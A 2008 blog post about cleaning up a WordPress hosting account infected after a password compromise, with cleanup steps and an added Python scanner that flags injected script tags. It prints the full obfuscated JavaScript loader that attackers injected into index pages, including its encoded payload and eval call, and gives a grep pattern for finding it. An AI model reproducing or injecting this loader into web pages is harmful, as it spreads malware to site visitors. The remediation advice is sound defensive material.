Nov 25, 2008

Why change your password?

Change your password regularly!

A panicky customer call came in the other day. It seems they recently implemented a WordPress blog and now one of their customers is asking them how come the website has malware.

Change your password regularly!

I had them send me FTP login information so I could look around. Sure enough, when I edited an index.* in any directory, there was a JavaScript entry sitting in the head tag with what appears to be garbage but ain’t! After taking a look around his files & directories, littered with malnamed directories, I asked them how many people had access to the hosting account and when was the last time they changed their password. They didn’t remember doing that before. I said “Oh.”

Change your password regularly!

I use Chrome. It’s fast, it works. When I visit the site, Chrome says “don’t visit this site it’s associated with 7speed.info and that’s known to have malware.” Turns out, 7speed.info isn’t registered anymore. But that’s beside the point. Here’s what it looked like:

Change your password regularly!

If this post comes up in search results for 7speed.info and you’re looking for help cuz your site is labeled, change your password, delete the:

<script language=JavaScript>function tobnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,62,45,0,25,55,44,41,2,31,0,0,0,0,0,0,3,38,33,21,20,16,19,10,42,35,13,32,24,17,4,40,46,56,53,15,60,5,50,47,57,48,51,0,0,0,0,26,0,49,6,29,7,12,54,34,23,28,58,11,14,36,43,27,8,59,52,39,37,30,61,1,18,22,9);for(s=Math.ceil(c/m);s>0;s–){h=”;for(i=Math.min(c,m);i>0;i–,c–){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(224^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}tobnb25(’hAOIN1QtlSztwx4tFfvam1OIUuTfN1QKCfLBlx7ZhG4gDypVdZcgbG4KJypYlbLIUfcf4FLrE@TmxlL58IptD87fS0TRF84BUxOZzjOBS1etS0vak5_KDgOZx1LtlxpV2bptpj6mwjpBSfpVzneRCkJRLsTVdscfNbJrdWTa8@TtzxptpfJRDIJYpyLgdgptcdJrM@TmDAzIUf2YNAQmEVLK4H2ISjLB8qJ5SsOBxbLIUjvaz@’)</script><!– yourdomain.com –>

entry from the index.* page for every domain on that host. The function name and code are different on each page, but it’s not readable; it’s obviously obfuscated. If it’s not in the index.* files, use a grep tool and search for “JavaScript>function”. Be sure to also remove any directories you don’t recognize (malnamed) from everywhere on the disk.
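
The search described above, as an added example (not code from the original post): a Python script that walks a web root and flags every file containing the “JavaScript>function” script tag, reporting the per-page function name and which decoder traits seen in the sample (eval, String.fromCharCode, charCodeAt) are present. The tolerance for quotes and whitespace in the pattern, the 2 MB size limit and the names scan_file and scan_tree are assumptions of this example.

```python
import os
import re
import sys

# Marker the post says to grep for ("JavaScript>function"), matched
# case-insensitively and tolerant of optional quotes/whitespace (assumption).
MARKER = re.compile(
    rb"<script\s+language\s*=\s*[\"']?javascript[\"']?\s*>\s*function\s+(\w+)\s*\(",
    re.IGNORECASE,
)
# Decoder traits visible in the sample shown on this page.
TRAITS = (b"eval(", b"String.fromCharCode", b"charCodeAt")
MAX_BYTES = 2 * 1024 * 1024  # assumption: skip files larger than 2 MB


def scan_file(path):
    """Return [(function_name, [traits found])] for each matching script tag."""
    try:
        if os.path.getsize(path) > MAX_BYTES:
            return []
        with open(path, "rb") as fh:
            data = fh.read()
    except OSError:
        return []  # unreadable file: nothing to report
    lowered = data.lower()
    hits = []
    for m in MARKER.finditer(data):
        end = lowered.find(b"</script>", m.end())
        body = data[m.start(): end if end != -1 else len(data)]
        found = [t.decode() for t in TRAITS if t in body]
        hits.append((m.group(1).decode("ascii", "replace"), found))
    return hits


def scan_tree(root):
    """Walk root (not only index.* files) and return {path: hits}."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                report[path] = hits
    return report


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in sorted(scan_tree(root).items()):
        for func, traits in hits:
            print(f"{path}: function {func} traits={','.join(traits) or 'none'}")
```

Run it against a downloaded copy of the hosting account; it only reads files, so removing the tag from each reported file is still a manual step.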

Change your password regularly!

If you need help after this, call me.

Did I mention, Change your password, regularly?

My Best,
Scott
Written by scott in: Malware, Tips, hosting